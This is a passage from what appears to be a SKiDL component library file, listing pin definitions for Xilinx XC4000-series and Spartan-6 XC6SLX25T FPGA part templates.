Pin(num='26',name='M2',func=Pin.PASSIVE,do_erc=True),
Pin(num='36',name='P36/INIT',func=Pin.PASSIVE,do_erc=True),
Pin(num='46',name='P46',func=Pin.PASSIVE,do_erc=True),
Pin(num='56',name='P56',func=Pin.BIDIR,do_erc=True),
Pin(num='66',name='P66',func=Pin.PASSIVE,do_erc=True),
Pin(num='76',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='86',name='P86',func=Pin.PASSIVE,do_erc=True),
Pin(num='96',name='P96',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='P17',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='PGCK2',func=Pin.PASSIVE,do_erc=True),
Pin(num='37',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='47',name='P47',func=Pin.PASSIVE,do_erc=True),
Pin(num='57',name='P57',func=Pin.PASSIVE,do_erc=True),
Pin(num='67',name='P67',func=Pin.PASSIVE,do_erc=True),
Pin(num='77',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='87',name='P87',func=Pin.PASSIVE,do_erc=True),
Pin(num='97',name='P97',func=Pin.PASSIVE,do_erc=True),
Pin(num='18',name='P18',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='P/HDC',func=Pin.PASSIVE,do_erc=True),
Pin(num='38',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='48',name='SGCK3',func=Pin.PASSIVE,do_erc=True),
Pin(num='58',name='P58',func=Pin.PASSIVE,do_erc=True),
Pin(num='68',name='P68',func=Pin.PASSIVE,do_erc=True),
Pin(num='78',name='P78',func=Pin.PASSIVE,do_erc=True),
Pin(num='88',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='98',name='P98',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='P19',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='P29',func=Pin.PASSIVE,do_erc=True),
Pin(num='39',name='P39',func=Pin.PASSIVE,do_erc=True),
Pin(num='49',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='59',name='P59',func=Pin.PASSIVE,do_erc=True),
Pin(num='69',name='P69',func=Pin.PASSIVE,do_erc=True),
Pin(num='79',name='PGCK4',func=Pin.PASSIVE,do_erc=True),
Pin(num='89',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='99',name='SGCK1',func=Pin.BIDIR,do_erc=True),
Pin(num='100',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='XC4004-PQ160',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC4005-PG156',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC4005-PQ100',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC4005-PQ160',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='XC6SLX25T-BG484',dest=TEMPLATE,tool=SKIDL,description='SPARTAN-6 FG484',ref_prefix='U',num_units=3,do_erc=True,pins=[
Pin(num='A2',name='IO_L3N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B2',name='IO_L3P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A3',name='IO_L5N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B3',name='IO_L5P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C3',name='IO_L1P_HSWAPEN_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D3',name='IO_L1N_VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A4',name='IO_L6N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B4',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='C4',name='IO_L6P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D4',name='IO_L2P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A5',name='IO_L8N_VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C5',name='IO_L8P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D5',name='IO_L2N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E5',name='IO_L4P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A6',name='MGTTXN0_101',func=Pin.OUTPUT,do_erc=True),
Pin(num='B6',name='MGTTXP0_101',func=Pin.OUTPUT,do_erc=True),
Pin(num='E6',name='IO_L4N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F6',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='A7',name='MGTAVTTTX_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='C7',name='MGTRXN0_101',do_erc=True),
Pin(num='D7',name='MGTRXP0_101',do_erc=True),
Pin(num='F7',name='IO_L7P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A8',name='MGTTXN1_101',func=Pin.OUTPUT,do_erc=True),
Pin(num='B8',name='MGTTXP1_101',func=Pin.OUTPUT,do_erc=True),
Pin(num='D8',name='MGTAVTTRX_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='E8',name='MGTAVTTRCAL_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='F8',name='IO_L7N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G8',name='IO_L32P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B9',name='MGTAVCCPLL0_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='C9',name='MGTRXN1_101',do_erc=True),
Pin(num='D9',name='MGTRXP1_101',do_erc=True),
Pin(num='E9',name='MGTRREF_101',do_erc=True),
Pin(num='F9',name='IO_L32N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G9',name='IO_L34P_GCLK19_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A10',name='MGTREFCLK0P_101',do_erc=True),
Pin(num='B10',name='MGTREFCLK0N_101',do_erc=True),
Pin(num='C10',name='MGTAVCC_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='F10',name='IO_L34N_GCLK18_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G10',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='H10',name='IO_L33P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A20',name='IO_L65N_SCP2_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B20',name='IO_L65P_SCP3_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C20',name='IO_L20P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='D20',name='TMS',do_erc=True),
Pin(num='E20',name='IO_L32P_A17_M1A8_1',func=Pin.BIDIR,do_erc=True),
Pin(num='F20',name='IO_L29N_A22_M1A14_1',func=Pin.BIDIR,do_erc=True),
Pin(num='G20',name='IO_L35P_A11_M1A7_1',func=Pin.BIDIR,do_erc=True),
Pin(num='H20',name='IO_L33N_A14_M1A4_1',func=Pin.BIDIR,do_erc=True),
Pin(num='J20',name='IO_L39P_M1A3_1',func=Pin.BIDIR,do_erc=True),
Pin(num='K20',name='IO_L38P_A5_M1CLK_1',func=Pin.BIDIR,do_erc=True),
Pin(num='L20',name='IO_L43P_GCLK5_M1DQ4_1',func=Pin.BIDIR,do_erc=True),
Pin(num='M20',name='IO_L40P_GCLK11_M1A5_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N20',name='IO_L45P_A1_M1LDQS_1',func=Pin.BIDIR,do_erc=True),
Pin(num='P20',name='IO_L42P_GCLK7_M1UDM_1',func=Pin.BIDIR,do_erc=True),
Pin(num='R20',name='IO_L47P_FWE_B_M1DQ0_1',func=Pin.BIDIR,do_erc=True),
Pin(num='T20',name='IO_L59N_1',func=Pin.BIDIR,do_erc=True),
Pin(num='U20',name='IO_L49P_M1DQ10_1',func=Pin.BIDIR,do_erc=True),
Pin(num='V20',name='IO_L74N_DOUT_BUSY_1',func=Pin.BIDIR,do_erc=True),
Pin(num='W20',name='IO_L51P_M1DQ12_1',func=Pin.BIDIR,do_erc=True),
Pin(num='C11',name='MGTREFCLK1P_101',do_erc=True),
Pin(num='D11',name='MGTREFCLK1N_101',do_erc=True),
Pin(num='G11',name='IO_L35N_GCLK16_0',func=Pin.BIDIR,do_erc=True),
Pin(num='H11',name='IO_L33N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='A21',name='TCK',do_erc=True),
Pin(num='C21',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='F21',name='IO_L31P_A19_M1CKE_1',func=Pin.BIDIR,do_erc=True),
Pin(num='G21',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='H21',name='IO_L37P_A7_M1A0_1',func=Pin.BIDIR,do_erc=True),
Pin(num='K21',name='IO_L41P_GCLK9_IRDY1_M1RASN_1',func=Pin.BIDIR,do_erc=True),
Pin(num='L21',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='M21',name='IO_L44P_A3_M1DQ6_1',func=Pin.BIDIR,do_erc=True),
Pin(num='P21',name='IO_L46P_FCS_B_M1DQ2_1',func=Pin.BIDIR,do_erc=True),
Pin(num='R21',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='T21',name='IO_L48P_HDC_M1DQ8_1',func=Pin.BIDIR,do_erc=True),
Pin(num='V21',name='IO_L50P_M1UDQS_1',func=Pin.BIDIR,do_erc=True),
Pin(num='W21',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='Y21',name='IO_L52P_M1DQ14_1',func=Pin.BIDIR,do_erc=True),
Pin(num='D12',name='MGTAVCCPLL1_101',func=Pin.PASSIVE,do_erc=True),
Pin(num='H12',name='IO_L35P_GCLK17_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C22',name='IO_L20N_1',func=Pin.BIDIR,do_erc=True),
Pin(num='E22',name='IO_L32N_A16_M1A9_1',func=Pin.BIDIR,do_erc=True),
Pin(num='F22',name='IO_L31N_A18_M1A12_1',func=Pin.BIDIR,do_erc=True),
Pin(num='G22',name='IO_L35N_A10_M1A2_1',func=Pin.BIDIR,do_erc=True),
Pin(num='H22',name='IO_L37N_A6_M1A1_1',func=Pin.BIDIR,do_erc=True),
Pin(num='J22',name='IO_L39N_M1ODT_1',func=Pin.BIDIR,do_erc=True),
Pin(num='K22',name='IO_L41N_GCLK8_M1CASN_1',func=Pin.BIDIR,do_erc=True),
Pin(num='L22',name='IO_L43N_CLK4_M1DQ5_1',func=Pin.BIDIR,do_erc=True),
Pin(num='M22',name='IO_L44N_A2_M1DQ7_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N22',name='IO_L45N_A0_M1LDQSN_1',func=Pin.BIDIR,do_erc=True),
Pin(num='P22',name='IO_L46N_FOE_B_M1DQ3_1',func=Pin.BIDIR,do_erc=True),
Pin(num='R22',name='IO_L47N_LDC_M1DQ1_1',func=Pin.BIDIR,do_erc=True),
Pin(num='T22',name='IO_L48N_M1DQ9_1',func=Pin.BIDIR,do_erc=True),
Pin(num='U22',name='IO_L49N_M1DQ11_1',func=Pin.BIDIR,do_erc=True),
Pin(num='V22',name='IO_L50N_M1UDQSN_1',func=Pin.BIDIR,do_erc=True),
Pin(num='W22',name='IO_L51N_M1DQ13_1',func=Pin.BIDIR,do_erc=True),
Pin(num='Y22',name='IO_L52N_M1DQ15_1',func=Pin.BIDIR,do_erc=True),
Pin(num='G13',name='IO_L38N_VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='H13',name='IO_L38P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F14',name='IO_L36P_GCLK15_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G14',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='H14',name='IO_L49P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F15',name='IO_L36N_GCLK14_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G15',name='IO_L49N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E16',name='IO_L37P_GCLK13_0',func=Pin.BIDIR,do_erc=True),
Pin(num='F16',name='IO_L37N_GCLK12_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G16',name='IO_L51P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='J16',name='IO_L19P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='L16',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='N16',name='IO_L60P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='P16',name='IO_L60N_1',func=Pin.BIDIR,do_erc=True),
Pin(num='A17',name='IO_L50N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C17',name='IO_L50P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D17',name='IO_L66P_SCP1_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E17',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='F17',name='IO_L51N_0',func=Pin.BIDIR,do_erc=True),
Pin(num='G17',name='TDO',func=Pin.OUTPUT,do_erc=True),
Pin(num='J17',name='IO_L19N_1',func=Pin.BIDIR,do_erc=True),
Pin(num='K17',name='IO_L36P_A9_M1BA0_1',do_erc=True),
Pin(num='L17',name='IO_L36N_A8_M1BA1_1',func=Pin.BIDIR,do_erc=True),
Pin(num='M17',name='IO_L61P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='A18',name='IO_L63N_SCP6_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B18',name='IO_L63P_SCP7_0',func=Pin.BIDIR,do_erc=True),
Pin(num='C18',name='IO_L66N_SCP0_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D18',name='IO_L62P_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E18',name='TDI',do_erc=True),
Pin(num='F18',name='IO_L1P_A25_1',func=Pin.BIDIR,do_erc=True),
Pin(num='H18',name='IO_L30P_A21_M1RESET_1',func=Pin.BIDIR,do_erc=True),
Pin(num='J18',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='K18',name='IO_L34N_A12_M1BA2_1',func=Pin.BIDIR,do_erc=True),
Pin(num='M18',name='IO_L61N_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N18',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='U18',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='A19',name='IO_L46N_SCP4_0',func=Pin.BIDIR,do_erc=True),
Pin(num='B19',name='VCCO_0',func=Pin.PWRIN,do_erc=True),
Pin(num='C19',name='IO_L64P_SCP5_0',func=Pin.BIDIR,do_erc=True),
Pin(num='D19',name='IO_L62N_VREF_0',func=Pin.BIDIR,do_erc=True),
Pin(num='E19',name='VCCO_1',func=Pin.PWRIN,do_erc=True),
Pin(num='F19',name='IO_L1N_A24_VREF_1',func=Pin.BIDIR,do_erc=True),
Pin(num='G19',name='IO_L29P_A23_M1A13_1',func=Pin.BIDIR,do_erc=True),
Pin(num='H19',name='IO_L30N_A20_M1A11_1',func=Pin.BIDIR,do_erc=True),
Pin(num='J19',name='IO_L33P_A15_M1A10_1',func=Pin.BIDIR,do_erc=True),
Pin(num='K19',name='IO_L34P_A13_M1WE_1',func=Pin.BIDIR,do_erc=True),
Pin(num='L19',name='IO_L38N_A4_M1CLKN_1',func=Pin.BIDIR,do_erc=True),
Pin(num='M19',name='IO_L40N_GCLK10_M1A6_1',func=Pin.BIDIR,do_erc=True),
Pin(num='N19',name='IO_L42N_GCLK6_TRDY1_M1LDM_1',func=Pin.BIDIR,do_erc=True),
Pin(num='P19',name='IO_L53P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='R19',name='IO_L53N_VREF_1',func=Pin.BIDIR,do_erc=True),
Pin(num='U19',name='IO_L59P_1',func=Pin.BIDIR,do_erc=True),
Pin(num='V19',name='IO_L74P_AWAKE_1',func=Pin.BIDIR,do_erc=True),
Pin(num='B1',name='IO_L83N_VREF_3',func=Pin.BIDIR,do_erc=True),
Pin(num='C1',name='IO_L83P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='D1',name='IO_L59N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E1',name='IO_L54N_M3A11_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F1',name='IO_L53N_M3A12_3',func=Pin.BIDIR,do_erc=True),
Pin(num='G1',name='IO_L52N_M3A9_3',func=Pin.BIDIR,do_erc=True),
Pin(num='H1',name='IO_L50N_M3BA2_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J1',name='IO_L48N_M3BA1_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K1',name='IO_L47N_M3A1_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L1',name='IO_L41N_GCLK26_M3DQ5_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M1',name='IO_L40N_M3DQ7_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N1',name='IO_L39N_M3LDQSN_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P1',name='IO_L38N_M3DQ3_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R1',name='IO_L37N_M3DQ1_3',func=Pin.BIDIR,do_erc=True),
Pin(num='T1',name='IO_L36N_M3DQ9_3',func=Pin.BIDIR,do_erc=True),
Pin(num='U1',name='IO_L35N_M3DQ11_3',func=Pin.BIDIR,do_erc=True),
Pin(num='V1',name='IO_L34N_M3UDQSN_3',func=Pin.BIDIR,do_erc=True),
Pin(num='W1',name='IO_L33N_M3DQ13_3',func=Pin.BIDIR,do_erc=True),
Pin(num='Y1',name='IO_L32N_M3DQ15_3',func=Pin.BIDIR,do_erc=True),
Pin(num='C2',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='D2',name='IO_L59P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F2',name='IO_L53P_M3CKE_3',func=Pin.BIDIR,do_erc=True),
Pin(num='G2',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='H2',name='IO_L50P_M3WE_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K2',name='IO_L47P_M3A0_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L2',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='M2',name='IO_L40P_M3DQ6_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P2',name='IO_L38P_M3DQ2_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R2',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='T2',name='IO_L36P_M3DQ8_3',func=Pin.BIDIR,do_erc=True),
Pin(num='V2',name='IO_L34P_M3UDQS_3',func=Pin.BIDIR,do_erc=True),
Pin(num='W2',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='Y2',name='IO_L32P_M3DQ14_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E3',name='IO_L54P_M3RESET_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F3',name='IO_L60P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='G3',name='IO_L52P_M3A8_3',func=Pin.BIDIR,do_erc=True),
Pin(num='H3',name='IO_L51N_M3A4_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J3',name='IO_L48P_M3BA0_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K3',name='IO_L46N_M3CLKN_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L3',name='IO_L41P_GCLK27_M3DQ4_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M3',name='IO_L44P_GCLK21_M3A5_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N3',name='IO_L39P_M3LDQS_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P3',name='IO_L42P_GCLK25_TRDY2_M3UDM_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R3',name='IO_L37P_M3DQ0_3',func=Pin.BIDIR,do_erc=True),
Pin(num='U3',name='IO_L35P_M3DQ10_3',func=Pin.BIDIR,do_erc=True),
Pin(num='W3',name='IO_L33P_M3DQ12_3',func=Pin.BIDIR,do_erc=True),
Pin(num='Y3',name='IO_L2N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='E4',name='IO_L60N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='F4',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='J4',name='IO_L51P_M3A10_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K4',name='IO_L46P_M3CLK_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L4',name='IO_L44N_GCLK207_M3A6_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M4',name='IO_L43N_GCLK22_TRDY2_M3CASN_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N4',name='IO_L42N_GCLK24_M3LDM_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P4',name='IO_L9N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='W4',name='IO_L2P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='Y4',name='IO_L65P_INIT_B_2',func=Pin.BIDIR,do_erc=True),
Pin(num='H5',name='IO_L55N_M3A14_3',func=Pin.BIDIR,do_erc=True),
Pin(num='J5',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='K5',name='IO_L49N_M3A2_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M5',name='IO_L43P_GCLK23_M3RASN_3',func=Pin.BIDIR,do_erc=True),
Pin(num='N5',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='P5',name='IO_L9P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='U5',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='W5',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='Y5',name='IO_L62P_D5_2',func=Pin.BIDIR,do_erc=True),
Pin(num='J6',name='IO_L55P_M3A13_3',func=Pin.BIDIR,do_erc=True),
Pin(num='K6',name='IO_L49P_M3A7_3',func=Pin.BIDIR,do_erc=True),
Pin(num='L6',name='IO_L45N_M3ODT_3',func=Pin.BIDIR,do_erc=True),
Pin(num='M6',name='IO_L45P_M3A3_3',func=Pin.BIDIR,do_erc=True),
Pin(num='U6',name='IO_L64N_D9_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W6',name='IO_L60P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y6',name='IO_L60N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='L7',name='VCCO_3',func=Pin.PWRIN,do_erc=True),
Pin(num='M7',name='IO_L31P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R7',name='IO_L1P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='T7',name='IO_L64P_D8_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V7',name='IO_L58P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y7',name='IO_L47P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='M8',name='IO_L31N_VREF_3',func=Pin.BIDIR,do_erc=True),
Pin(num='P8',name='IO_L1N_VREF_3',func=Pin.BIDIR,do_erc=True),
Pin(num='R8',name='IO_L59N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='T8',name='IO_L57P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='U8',name='IO_L57N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V8',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='W8',name='IO_L58N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y8',name='IO_L48N_RDWR_B_VREF_2',func=Pin.BIDIR,do_erc=True),
Pin(num='R9',name='IO_L59P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='T9',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='U9',name='IO_L50P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V9',name='IO_L50N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W9',name='IO_L48P_D7_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y9',name='IO_L43P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='T10',name='IO_L46P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='U10',name='IO_L46N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W10',name='IO_L44P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y10',name='IO_L44N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y20',name='IO_L1P_CCLK_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V11',name='IO_L42P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W11',name='IO_L42N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y11',name='IO_L32P_GCLK29_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA1',name='IO_L10N_3',func=Pin.BIDIR,do_erc=True),
Pin(num='T12',name='IO_L29P_GCLK3_2',func=Pin.BIDIR,do_erc=True),
Pin(num='U12',name='IO_L29N_GCLK2_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V12',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='W12',name='IO_L40P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y12',name='IO_L40N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA2',name='IO_L10P_3',func=Pin.BIDIR,do_erc=True),
Pin(num='AB2',name='PROGRAM_B_2',do_erc=True),
Pin(num='R13',name='IO_L12P_D1_MISO2_2',func=Pin.BIDIR,do_erc=True),
Pin(num='T13',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='U13',name='IO_L16N_VREF_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V13',name='IO_L18P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W13',name='IO_L18N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y13',name='IO_L30P_GCLK1_D13_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA3',name='IO_L65N_CSO_B_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB3',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='T14',name='IO_L12N_D2_MISO3_2',func=Pin.BIDIR,do_erc=True),
Pin(num='U14',name='IO_L16P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W14',name='IO_L20P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y14',name='IO_L20N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA4',name='IO_L63P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB4',name='IO_L63N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W15',name='IO_L17N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y15',name='IO_L21P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB5',name='IO_L62N_D6_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V16',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='Y16',name='IO_L17P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA6',name='IO_L49P_D3_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB6',name='IO_L49N_D4_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V17',name='IO_L2P_CMPCLK_2',func=Pin.BIDIR,do_erc=True),
Pin(num='W17',name='IO_L5P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y17',name='IO_L15P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA7',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='AB7',name='IO_L47N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='V18',name='CMPCS_B_2',do_erc=True),
Pin(num='W18',name='IO_L2N_CMPMOSI_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y18',name='IO_L5N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA8',name='IO_L45P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB8',name='IO_L45N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='Y19',name='IO_L13P_M1_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB9',name='IO_L43N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA10',name='IO_L41P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB10',name='IO_L41N_VREF_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA20',name='IO_L3P_D0_DIN_MISO_MISO1_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB20',name='IO_L3N_MOSI_CSI_B_MISO0_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA11',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='AB11',name='IO_L32N_GCLK28_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA21',name='IO_L1N_M0_CMPMISO_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB21',name='DONE_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA12',name='IO_L31P_GCLK31_D14_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB12',name='IO_L31N_GCLK30_D15_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA22',name='SUSPEND',do_erc=True),
Pin(num='AB13',name='IO_L30N_GCLK0_USERCCLK_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA14',name='IO_L6P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB14',name='IO_L6N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA15',name='VCCO_2',func=Pin.PWRIN,do_erc=True),
Pin(num='AB15',name='IO_L21N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA16',name='IO_L19P_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB16',name='IO_L19N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB17',name='IO_L15N_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AA18',name='IO_L14P_D11_2',func=Pin.BIDIR,do_erc=True),
Pin(num='AB18',name='IO_L14N_D12_2',func=Pin.BIDIR,do_erc=True),
